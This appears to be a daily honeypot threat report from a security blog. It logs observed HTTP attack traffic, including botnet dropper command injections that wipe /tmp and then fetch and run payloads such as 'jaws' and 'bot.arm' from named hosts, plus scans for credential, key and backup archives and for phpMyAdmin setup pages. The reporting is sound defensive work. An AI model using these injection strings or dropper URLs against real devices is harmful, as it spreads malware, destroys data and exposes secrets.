Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-07-07

·1787 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-07
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 15 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 286 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1614 requests were recorded during the day, originating from 15 different countries, with a peak of 745 requests coming from SG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
KRGermany
USGermany
DEGermany
USGermany
USGermany
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
8.222.186.148GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
118.193.61.245GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
207.167.66.226GET /shell.cgi?wget+http%3A%2F%2F195.26.230.140%2Fbot.arm%3Bchmod+%2Bx+bot.arm%3B.%2Fbot.arm+netwave HTTP/1.1
8.222.162.163GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.145.211GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
128.14.227.182GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
47.236.247.145GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
128.1.32.115GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.132.133GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
156.238.249.239GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1
8.219.57.99GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
121.237.177.84GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
87.121.84.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.234.135/x/tplink+-O-
41.238.44.147GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1
182.42.156.162GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
106GET /connector.sds HTTP/1.1
653GET /root.zip HTTP/1.1
663GET /functions.zip HTTP/1.1
673GET /dashboard.zip HTTP/1.1
683GET /aws/data.zip HTTP/1.1
693GET /db_backup.zip HTTP/1.1
703GET /uploads.zip HTTP/1.1
713GET /python_server.zip HTTP/1.1
723GET /temporary.zip HTTP/1.1
733GET /s3/data.zip HTTP/1.1
743GET /public.zip HTTP/1.1
753GET /bak.zip HTTP/1.1
763GET /Archive.zip HTTP/1.1
773GET /venv.zip HTTP/1.1
793GET /firebase.zip HTTP/1.1
803GET /django.zip HTTP/1.1
813GET /index.zip HTTP/1.1
823GET /mail.zip HTTP/1.1
833GET /package.zip HTTP/1.1
843GET /administrators.zip HTTP/1.1
853GET /server.zip HTTP/1.1
863GET /website.zip HTTP/1.1
873GET /node_modules.zip HTTP/1.1
883GET /asgi.py.zip HTTP/1.1
903GET /users.zip HTTP/1.1
913GET /sqllite.zip HTTP/1.1
933GET /database.zip HTTP/1.1
943GET /creds.zip HTTP/1.1
953GET /sqlite.zip HTTP/1.1
963GET /config.zip HTTP/1.1
973GET /config.js.zip HTTP/1.1
983GET /configuration.zip HTTP/1.1
993GET /dbadmin.zip HTTP/1.1
1003GET /s3.zip HTTP/1.1
1013GET /conf/conf.zip HTTP/1.1
1023GET /s3/backup.zip HTTP/1.1
1033GET /configs.zip HTTP/1.1
1043GET /ftp.zip HTTP/1.1
1053GET /aws/credentials.zip HTTP/1.1
1063GET /base.zip HTTP/1.1
1073GET /ec2/image.zip HTTP/1.1
1083GET /sql.zip HTTP/1.1
1093GET /backups.zip HTTP/1.1
1103GET /backup_4.zip HTTP/1.1
1113GET /lite.zip HTTP/1.1
1123GET /controllers.zip HTTP/1.1
1133GET /websites.zip HTTP/1.1
1143GET /private.zip HTTP/1.1
1153GET /dbase.zip HTTP/1.1
1163GET /tmp.zip HTTP/1.1
1173GET /home.zip HTTP/1.1
1183GET /backup_2.zip HTTP/1.1
1193GET /archive.zip HTTP/1.1
1203GET /mysql.zip HTTP/1.1
1213GET /ec2/snapshot.zip HTTP/1.1
1223GET /aws.zip HTTP/1.1
1243GET /s3/db.zip HTTP/1.1
1253GET /go.sum.zip HTTP/1.1
1263GET /os.zip HTTP/1.1
1273GET /ec2.zip HTTP/1.1
1283GET /nuxt.zip HTTP/1.1
1293GET /wsgi.py.zip HTTP/1.1
1303GET /middleware.zip HTTP/1.1
1313GET /conf.zip HTTP/1.1
1323GET /pipenv.zip HTTP/1.1
1333GET /routes.zip HTTP/1.1
1343GET /requirements.txt.zip HTTP/1.1
1363GET /webapps.zip HTTP/1.1
1373GET /lambda.zip HTTP/1.1
1383GET /WEB-INF.zip HTTP/1.1
1393GET /pipfile.zip HTTP/1.1
1403GET /js_server.zip HTTP/1.1
1413GET /templates.zip HTTP/1.1
1423GET /credentials.zip HTTP/1.1
1433GET /support.zip HTTP/1.1
1443GET /pydantic.zip HTTP/1.1
1453GET /main.go.zip HTTP/1.1
1463GET /app.py.zip HTTP/1.1
1473GET /handlers.zip HTTP/1.1
1483GET /pyproject.toml.zip HTTP/1.1
1493GET /application.properties.zip HTTP/1.1
1503GET /ci.zip HTTP/1.1
1513GET /nestjs.zip HTTP/1.1
1523GET /aws/secrets.zip HTTP/1.1
1533GET /js_backend.zip HTTP/1.1
1543GET /koa.zip HTTP/1.1
1553GET /administration.zip HTTP/1.1
1563GET /fiber.zip HTTP/1.1
1583GET /htdocs.zip HTTP/1.1
1593GET /mailer.zip HTTP/1.1
1603GET /router.zip HTTP/1.1
1613GET /api_server.zip HTTP/1.1
1623GET /temp.zip HTTP/1.1
1643GET /lib.zip HTTP/1.1
1653GET /mux.zip HTTP/1.1
1663GET /pom.xml.zip HTTP/1.1
1673GET /apis.zip HTTP/1.1
1683GET /package-lock.json.zip HTTP/1.1
1693GET /ec2/temp.zip HTTP/1.1
1703GET /pkg.zip HTTP/1.1
1713GET /instance.zip HTTP/1.1
1723GET /main.py.zip HTTP/1.1
1733GET /aws/config.zip HTTP/1.1
1743GET /admin.zip HTTP/1.1
1753GET /back_up.zip HTTP/1.1
1763GET /vercel.zip HTTP/1.1
1773GET /nextjs.zip HTTP/1.1
1783GET /settings.py.zip HTTP/1.1
1793GET /gin.zip HTTP/1.1
1803GET /config.go.zip HTTP/1.1
1813GET /server.js.zip HTTP/1.1
1833GET /keys.zip HTTP/1.1
1843GET /devops.zip HTTP/1.1
1853GET /private_keys.zip HTTP/1.1
1863GET /.env.dev.zip HTTP/1.1
1873GET /Rakefile.zip HTTP/1.1
1883GET /jenkins.zip HTTP/1.1
1893GET /autoload.zip HTTP/1.1
1903GET /META-INF.zip HTTP/1.1
1913GET /key.pem.zip HTTP/1.1
1923GET /dev.zip HTTP/1.1
1933GET /editor.zip HTTP/1.1
1953GET /charts.zip HTTP/1.1
1963GET /secrets.json.zip HTTP/1.1
1973GET /go.mod.zip HTTP/1.1
1983GET /Dockerfile.zip HTTP/1.1
1993GET /docker-compose.yml.zip HTTP/1.1
2003GET /helm.zip HTTP/1.1
2013GET /target.zip HTTP/1.1
2023GET /spring.zip HTTP/1.1
2033GET /key.zip HTTP/1.1
2043GET /k8s.zip HTTP/1.1
2053GET /webpack.zip HTTP/1.1
2063GET /php_backend.zip HTTP/1.1
2073GET /project.zip HTTP/1.1
2083GET /config.json.zip HTTP/1.1
2093GET /tokens.zip HTTP/1.1
2113GET /react.zip HTTP/1.1
2123GET /cicd.zip HTTP/1.1
2133GET /vite.zip HTTP/1.1
2143GET /compose.zip HTTP/1.1
2153GET /Gemfile.zip HTTP/1.1
2163GET /migrations.zip HTTP/1.1
2173GET /gradle.zip HTTP/1.1
2183GET /rails.zip HTTP/1.1
2193GET /chi.zip HTTP/1.1
2203GET /go_server.zip HTTP/1.1
2213GET /apps.zip HTTP/1.1
2223GET /.env.production.zip HTTP/1.1
2233GET /hapi.zip HTTP/1.1
2243GET /web.xml.zip HTTP/1.1
2313GET /flask.zip HTTP/1.1
2323GET /projects.zip HTTP/1.1
2333GET /auth.zip HTTP/1.1
2343GET /jsconfig.json.zip HTTP/1.1
2353GET /babel.zip HTTP/1.1
2363GET /config.ru.zip HTTP/1.1
2373GET /apikeys.zip HTTP/1.1
2383GET /api_keys.zip HTTP/1.1
2393GET /springboot.zip HTTP/1.1
2403GET /sql_dump.zip HTTP/1.1
2413GET /ruby.zip HTTP/1.1
2433GET /id_rsa.pub.zip HTTP/1.1
2443GET /dev_env.zip HTTP/1.1
2453GET /.env.local.zip HTTP/1.1
2463GET /workspace.zip HTTP/1.1
2473GET /manage.py.zip HTTP/1.1
2483GET /.github.zip HTTP/1.1
2513GET /ec2/root.zip HTTP/1.1
2523GET /db.zip HTTP/1.1
2543GET /Release.zip HTTP/1.1
2553GET /express.zip HTTP/1.1
2563GET /kubernetes.zip HTTP/1.1
2583GET /.git.zip HTTP/1.1
2593GET /vue.zip HTTP/1.1
2603GET /application.yml.zip HTTP/1.1
2613GET /fastapi.zip HTTP/1.1
2623GET /java_backend.zip HTTP/1.1
2633GET /composer.lock.zip HTTP/1.1
2643GET /vendor.zip HTTP/1.1
2653GET /cert.pem.zip HTTP/1.1
2673GET /app.zip HTTP/1.1
2683GET /public_html.zip HTTP/1.1
2693GET /output.zip HTTP/1.1
2703GET /inetpub.zip HTTP/1.1
2713GET /package.json.zip HTTP/1.1
2723GET /wordpress.zip HTTP/1.1
2743GET /api.zip HTTP/1.1
2753GET /backup_1.zip HTTP/1.1
2763GET /s3/config.zip HTTP/1.1
2793GET /backup_3.zip HTTP/1.1
2813GET /dbdump.zip HTTP/1.1
2823GET /wwwroot.zip HTTP/1.1
2833GET /Gemfile.lock.zip HTTP/1.1
2843GET /secrets.zip HTTP/1.1
2853GET /core.zip HTTP/1.1
2863GET /hugo.zip HTTP/1.1
2873GET /template.zip HTTP/1.1
2883GET /token.zip HTTP/1.1
2893GET /id_rsa.zip HTTP/1.1
2903GET /utils.zip HTTP/1.1
2913GET /next.zip HTTP/1.1
2923GET /build.gradle.zip HTTP/1.1
2933GET /php.zip HTTP/1.1
2953GET /rollup.zip HTTP/1.1
2963GET /angular.zip HTTP/1.1
2973GET /composer.json.zip HTTP/1.1
2983GET /prettier.zip HTTP/1.1
2993GET /static.zip HTTP/1.1
3003GET /laravel.zip HTTP/1.1
3013GET /classes.zip HTTP/1.1
3023GET /cmd.zip HTTP/1.1
3033GET /internal.zip HTTP/1.1
3043GET /pycache.zip HTTP/1.1
3053GET /golang_backend.zip HTTP/1.1
3063GET /.gitlab-ci.yml.zip HTTP/1.1
3073GET /eslint.zip HTTP/1.1
3083GET /tsconfig.json.zip HTTP/1.1
3093GET /python_backend.zip HTTP/1.1
3103GET /jekyll.zip HTTP/1.1
3113GET /nest.zip HTTP/1.1
3123GET /auth.json.zip HTTP/1.1
3133GET /api_key.zip HTTP/1.1
3143GET /symfony.zip HTTP/1.1
3153GET /jsp.zip HTTP/1.1
3163GET /svelte.zip HTTP/1.1
3202CONNECT www.serv00.com:443 HTTP/1.1
3771\x00\x0E\x08\xF8\x9F\xD4w\x94S\x9F\xA4\x00\x00\x00\x00\x00
3781\x00\x0E8\xF8\x9F\xD4w\x94S\x9F\xA4\x00\x00\x00\x00\x00
4081GET /odinhttpcall1751874539 HTTP/1.1
4101GET /OdinHttpCall1751874539 HTTP/1.1
4111GET /Odin/http/call1751874539 HTTP/1.1
4131GET http://xxx.xxx.xxx.xxx:80/php/scripts/setup.php HTTP/1.0
4141GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0
4231GET /admin/includes/general.js HTTP/1.1
4241GET /images/editor/separator.gif HTTP/1.1
4531\x00\x0E\x08\x8E}o\xC6Fm\x18H\x00\x00\x00\x00\x00
4541\x00\x0E8\x8E}o\xC6Fm\x18H\x00\x00\x00\x00\x00
4741GET /shell.cgi?echo+check HTTP/1.1
4771GET http://xxx.xxx.xxx.xxx:80/webadmin/scripts/setup.php HTTP/1.0
4781GET http://xxx.xxx.xxx.xxx:80/pma/scripts/setup.php HTTP/1.0
4791GET http://xxx.xxx.xxx.xxx:80/_phpMyAdmin/scripts/setup.php HTTP/1.0
4801GET http://xxx.xxx.xxx.xxx:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
4811GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0
4831GET http://xxx.xxx.xxx.xxx:80/dbadmin/scripts/setup.php HTTP/1.0
4871GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0
4881GET http://xxx.xxx.xxx.xxx:80/sqlmanager/scripts/setup.php HTTP/1.0
4891GET http://xxx.xxx.xxx.xxx:80/mysql/scripts/setup.php HTTP/1.0
4901GET http://xxx.xxx.xxx.xxx:80/myadmin/scripts/setup.php HTTP/1.0
4911GET http://xxx.xxx.xxx.xxx:80/MyAdmin/scripts/setup.php HTTP/1.0
4921GET /css/elfinder.min.css HTTP/1.1
4931GET /api/v3/meta HTTP/1.1
4941GET /am_bin/amlogin HTTP/1.1
4951GET /system/version/current HTTP/1.1
4961GET http://xxx.xxx.xxx.xxx:80/db/scripts/setup.php HTTP/1.0
5031GET /plugin/webs_model_cfg.js HTTP/1.1
5041GET /Main_Login.asp HTTP/1.1
5051GET /cgi-bin/luci HTTP/1.1
5061GET /cap.js HTTP/1.1
5071GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
5081GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
5181GET http://xxx.xxx.xxx.xxx:80/phpmyadmin/scripts/setup.php HTTP/1.0
5281GET http://xxx.xxx.xxx.xxx:80/sql/scripts/setup.php HTTP/1.0
5291GET http://xxx.xxx.xxx.xxx:80/mysql-admin/scripts/setup.php HTTP/1.0
5301GET http://xxx.xxx.xxx.xxx:80/sqlweb/scripts/setup.php HTTP/1.0
5311GET http://xxx.xxx.xxx.xxx:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0
5321GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
5331GET http://xxx.xxx.xxx.xxx:80/SQL/scripts/setup.php HTTP/1.0
5341GET http://xxx.xxx.xxx.xxx:80/phpMyAdmin/scripts/setup.php HTTP/1.0
5351GET http://xxx.xxx.xxx.xxx:80/phpma/scripts/setup.php HTTP/1.0
5541GET /centreon/api/latest/platform/versions HTTP/1.1
5831\x00\x0E\x08C\x8BzZ\x1A\xA3dU\x00\x00\x00\x00\x00
5841\x00\x0E8C\x8BzZ\x1A\xA3dU\x00\x00\x00\x00\x00
5961GET /workplace/home.action HTTP/1.1
5971GET /css/eonweb.css HTTP/1.1
5981GET /pandora_console/ HTTP/1.1
6021GET /javascript/validation/OEM.js HTTP/1.1
6051GET /webportal.cgi HTTP/1.1
6071\x00\x0E\x08<\xA8n \x1F\x87\x14F\x00\x00\x00\x00\x00
6091\x00\x0E8<\xA8n \x1F\x87\x14F\x00\x00\x00\x00\x00
6101GET /api/v1/version HTTP/1.1
6111GET /i18n/component/JS HTTP/1.1
6121GET /hx/api/about HTTP/1.1
6131GET /app/ui/login.jsp HTTP/1.1
6141GET /login/?next=/ HTTP/1.1
6151GET /MagicInfo/config.js HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0745SG
1216US
2109CN
384FR
475DE
573NL
646SE
738RU
834SC
927CA
1024JP
1122PL
1218BG
1312MT
1411AU
159BR
167GB
176FI
186BE
196GH
205UA
214LT
224KR
233KZ
243IN
252AO
262MM
272ZA
282TW
292CO
302AE
312IE
321RO
331MU
341ES
351IL
361PK
371IR
381CL
391KH
401AT
411NG
421EG
431ID
441AR

Related

Report: 2025-07-06
·307 words
Repport Daily
Report: 2025-07-05
·484 words
Repport Daily
Report: 2025-07-04
·350 words
Repport Daily